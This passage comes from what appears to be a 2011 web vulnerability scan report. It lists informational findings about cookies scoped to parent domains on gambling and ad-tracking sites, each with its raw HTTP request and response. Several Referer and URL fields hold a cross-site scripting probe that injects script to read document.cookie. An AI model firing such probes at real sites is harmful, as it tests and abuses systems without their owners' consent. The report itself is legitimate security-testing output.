Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.61. http://no.bigmoneyscratch.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://no.bigmoneyscratch.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_12=EncryptedUniqueVisitorID=29FFBAAEA73D5B5F2F922DE01CED2B55&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 11:58:56 GMT; path=/
UniqueVisitorID=29FFBAAEA73D5B5F2F922DE01CED2B55; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:58:56 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: no.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:58:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=b2f3co55vtup5rji1vapqb55; path=/; HttpOnly
Set-Cookie: LanguageCode=NOR; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:58:56 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=29FFBAAEA73D5B5F2F922DE01CED2B55&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 11:58:56 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:58:56 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:58:56 GMT; path=/
Set-Cookie: UniqueVisitorID=29FFBAAEA73D5B5F2F922DE01CED2B55; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:58:56 GMT; path=/
Set-Cookie: LanguageCode=NOR; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:58:56 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:58:56 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47071

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.62. http://no.karamba.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://no.karamba.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_27=EncryptedUniqueVisitorID=522E66105AD1EC714AF629DF19E62306&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:35:39 GMT; path=/
UniqueVisitorID=522E66105AD1EC714AF629DF19E62306; domain=karamba.com; expires=Fri, 16-May-2014 12:35:39 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: no.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=m32wka451cran0zbscse5n55; path=/; HttpOnly
Set-Cookie: LanguageCode=NOR; domain=karamba.com; expires=Fri, 16-May-2014 12:35:39 GMT; path=/
Set-Cookie: CSI_27=EncryptedUniqueVisitorID=522E66105AD1EC714AF629DF19E62306&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:35:39 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:35:39 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:35:39 GMT; path=/
Set-Cookie: UniqueVisitorID=522E66105AD1EC714AF629DF19E62306; domain=karamba.com; expires=Fri, 16-May-2014 12:35:39 GMT; path=/
Set-Cookie: LanguageCode=NOR; domain=karamba.com; expires=Fri, 16-May-2014 12:35:39 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:35:39 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.63. http://no.scratchcardheaven.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://no.scratchcardheaven.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_8=EncryptedUniqueVisitorID=20914B9EC2030E414402DD35EBA7E838&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:39:25 GMT; path=/
UniqueVisitorID=20914B9EC2030E414402DD35EBA7E838; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:39:25 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: no.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:39:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=3mvctbasrautiu55bmexne55; path=/; HttpOnly
Set-Cookie: LanguageCode=NOR; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:39:25 GMT; path=/
Set-Cookie: CSI_8=EncryptedUniqueVisitorID=20914B9EC2030E414402DD35EBA7E838&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:39:25 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:39:25 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:39:25 GMT; path=/
Set-Cookie: UniqueVisitorID=20914B9EC2030E414402DD35EBA7E838; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:39:25 GMT; path=/
Set-Cookie: LanguageCode=NOR; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:39:25 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:39:25 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44142

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.64. http://pixel.invitemedia.com/data_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/data_sync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

dp_rec="{\"2\": 1305550329}"; Domain=invitemedia.com; expires=Tue, 15-May-2012 12:52:09 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /data_sync?partner_id=41&exchange_id=4 HTTP/1.1
Host: pixel.invitemedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg;pos=rect2;sz=300x300,300x250;atf=no;name=300x250btf;pageURL=www.metacafe.com%2Ffplayer%2F%3F4702d%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ebe96a23f3a3%3D1;studio=null;section=null;category=null;channel=null;rating=clean;hd=no;env=prod;branding=null;fbconnected=false;ffilter=true;referrer=null;LEID=40;tile=8;ord=4284276430058379
Cookie: segments_p1="eJzjYuFo2czIxcIx5y0jFxfHnn3MAv82n3vHwsXM8S8cAHevCXM="; uid=2ecd6c1e-5306-444b-942d-9108b17fd086; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjY4XSwgIjQiOiBbIkNBRVNFTHhJVnRkbXQzZEthZnMzRlQ4dDRRMCIsIDczNDI2N119; subID="{}"; impressions="{\"591269\": [1305111613+ \"2904264903406918006\"+ 184+ 789+ 926]+ \"591281\": [1305111351+ \"2727804715311744746\"+ 184+ 789+ 926]}"; camp_freq_p1=eJzjkuF49ZlFgEli742V71gUmDT2PwHSBkwW268BaQCvyAyE; io_freq_p1="eJzjkuY4HijAJLH3xsp3LAqMGj9BtAGTxfZrQBoAnC8L5w=="

Response

11.65. http://pixel.quantserve.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

d=EKIBXQHhBoGTDhmtEqlQq8GBuGECniAAAACKoXoYEHOBFzDLOB9XIDBYGxBgqDWv8hEA; expires=Sun, 14-Aug-2011 12:51:52 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=572101393;fpan=u;fpa=;ns=0;url=http%3A%2F%2Fwww.metacafe.com%2Ffplayer%2F%3F4702d%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ebe96a23f3a3%3D1;ref=http%3A%2F%2Fburp%2Fshow%2F22;ce=1;je=1;sr=1920x1200x24;enc=n;ogl=site_name.Metacafe;dst=1;et=1305550311743;tzo=300;a=p-96ifrWFBpTdiA;media=ad;labels=_imp.adserver.doubleclick%2C_imp.publisher.62878001%2C_imp.placement.239990545%2C_imp.creative.41692150 HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: mc=4d529fca-2c7e4-2f739-1ba49; d=EMIBXQHgBoHyDhmtEqlQq8GBuGECniAAAACKoXoYEHOBFzDLOB9XIDBYGxBgqDWv8hEA

Response

HTTP/1.1 204 No Content
Connection: close
Set-Cookie: d=EKIBXQHhBoGTDhmtEqlQq8GBuGECniAAAACKoXoYEHOBFzDLOB9XIDBYGxBgqDWv8hEA; expires=Sun, 14-Aug-2011 12:51:52 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Date: Mon, 16 May 2011 12:51:52 GMT
Server: QS

11.66. http://pixel.quantserve.com/pixel/p-96ifrWFBpTdiA.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel/p-96ifrWFBpTdiA.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

d=EKIBXQHhBoGTDhmtEqlQq8GBuGECniAAAACKoXoYEHOBFzDLOB9XIDBYGxBgqDWv8hEA; expires=Sun, 14-Aug-2011 12:51:52 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/p-96ifrWFBpTdiA.gif?media=ad&labels=_imp.adserver.doubleclick,_imp.publisher.62878001,_imp.placement.239990545,_imp.creative.41692150 HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: mc=4d529fca-2c7e4-2f739-1ba49; d=EMIBXQHgBoHyDhmtEqlQq8GBuGECniAAAACKoXoYEHOBFzDLOB9XIDBYGxBgqDWv8hEA

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=EKIBXQHhBoGTDhmtEqlQq8GBuGECniAAAACKoXoYEHOBFzDLOB9XIDBYGxBgqDWv8hEA; expires=Sun, 14-Aug-2011 12:51:52 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Content-Type: image/gif
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Mon, 16 May 2011 12:51:52 GMT
Server: QS

GIF89a.......,.................D..;

11.67. http://pt.bigmoneyscratch.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pt.bigmoneyscratch.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_12=EncryptedUniqueVisitorID=D3E2C7C0FC1C66FB51594A8A6E84CF00&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:32:29 GMT; path=/
UniqueVisitorID=D3E2C7C0FC1C66FB51594A8A6E84CF00; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: pt.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=pahz1f55bifuak454oua1545; path=/; HttpOnly
Set-Cookie: LanguageCode=POR; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=D3E2C7C0FC1C66FB51594A8A6E84CF00&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:32:29 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: UniqueVisitorID=D3E2C7C0FC1C66FB51594A8A6E84CF00; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: LanguageCode=POR; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48503

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.68. http://pt.karamba.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pt.karamba.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_27=EncryptedUniqueVisitorID=582C4C70EA7E56EDD6D14F40E161EA4F&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:01:31 GMT; path=/
UniqueVisitorID=582C4C70EA7E56EDD6D14F40E161EA4F; domain=karamba.com; expires=Fri, 16-May-2014 12:01:31 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: pt.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:01:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=noicjv45pm3igo55xdqqujbl; path=/; HttpOnly
Set-Cookie: LanguageCode=POR; domain=karamba.com; expires=Fri, 16-May-2014 12:01:31 GMT; path=/
Set-Cookie: CSI_27=EncryptedUniqueVisitorID=582C4C70EA7E56EDD6D14F40E161EA4F&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:01:31 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:01:31 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:01:31 GMT; path=/
Set-Cookie: UniqueVisitorID=582C4C70EA7E56EDD6D14F40E161EA4F; domain=karamba.com; expires=Fri, 16-May-2014 12:01:31 GMT; path=/
Set-Cookie: LanguageCode=POR; domain=karamba.com; expires=Fri, 16-May-2014 12:01:31 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:01:31 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.69. http://pt.scratch2cash.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pt.scratch2cash.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_1=EncryptedUniqueVisitorID=4B1905225FA4B80745F583B7A7A6774D&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 12:20:36 GMT; path=/
UniqueVisitorID=4B1905225FA4B80745F583B7A7A6774D; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:20:36 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: pt.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:20:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=w4te23y1zi5nuxrpfwibpqbn; path=/; HttpOnly
Set-Cookie: LanguageCode=POR; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:20:36 GMT; path=/
Set-Cookie: CSI_1=EncryptedUniqueVisitorID=4B1905225FA4B80745F583B7A7A6774D&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 12:20:36 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:20:36 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:20:36 GMT; path=/
Set-Cookie: UniqueVisitorID=4B1905225FA4B80745F583B7A7A6774D; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:20:36 GMT; path=/
Set-Cookie: LanguageCode=POR; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:20:36 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:20:36 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44934

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.70. http://pt.scratchcardheaven.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pt.scratchcardheaven.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_8=EncryptedUniqueVisitorID=BC872EF8D517737D5602A1CEA609E353&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:32:17 GMT; path=/
UniqueVisitorID=BC872EF8D517737D5602A1CEA609E353; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: pt.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=1ezix3mzcpqnyv3il13wvcqv; path=/; HttpOnly
Set-Cookie: LanguageCode=POR; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: CSI_8=EncryptedUniqueVisitorID=BC872EF8D517737D5602A1CEA609E353&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:32:17 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: UniqueVisitorID=BC872EF8D517737D5602A1CEA609E353; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: LanguageCode=POR; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.71. http://server.iad.liveperson.net/hc/15712222/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://server.iad.liveperson.net
Path:	/hc/15712222/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

LivePersonID=-16101514677756-1305546140:0; expires=Tue, 15-May-2012 11:42:20 GMT; path=/hc/15712222; domain=.liveperson.net
LivePersonID=-16101514677756-1305546140:-1:-1:-1:-1; expires=Tue, 15-May-2012 11:42:20 GMT; path=/hc/15712222; domain=.liveperson.net

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/15712222/?&site=15712222&cmd=mTagStartPage&lpCallId=120615486754-137820172356&protV=20&lpjson=1&page=http%3A//www.scratchcardheaven.com/&id=636622910&javaSupport=true&visitorStatus=INSITE_STATUS&activePlugin=none&cobrowse=true&title=Online%20Scratch%20cards%2C%20featuring%20over%2080%20flash%20Scratch%20games%20and%20scratch%20off%20tickets%20%u2013%20scratchcardheaven.com%20Scratchcards HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.scratchcardheaven.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=4711607244455630702; LivePersonID=LP i=16101514677756,d=1305377522; HumanClickACTIVE=1305546129531

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:42:20 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LivePersonID=-16101514677756-1305546140:0; expires=Tue, 15-May-2012 11:42:20 GMT; path=/hc/15712222; domain=.liveperson.net
Set-Cookie: HumanClickKEY=4711607244455630702; path=/hc/15712222
Set-Cookie: HumanClickSiteContainerID_15712222=STANDALONE; path=/hc/15712222
Set-Cookie: LivePersonID=-16101514677756-1305546140:-1:-1:-1:-1; expires=Tue, 15-May-2012 11:42:20 GMT; path=/hc/15712222; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 16 May 2011 11:42:20 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1998

lpConnLib.Process({"ResultSet": {"lpCallId":"120615486754-137820172356","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton
...[SNIP]...

11.72. http://solutions.liveperson.com/ref/lppb.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://solutions.liveperson.com
Path:	/ref/lppb.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

visitor=ref=LP+Power+%2D+; expires=Sun, 10-Jan-2010 05:00:00 GMT; domain=.liveperson.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ref/lppb.asp HTTP/1.1
Host: solutions.liveperson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Mon, 16 May 2011 12:31:57 GMT
Server: Microsoft-IIS/6.0
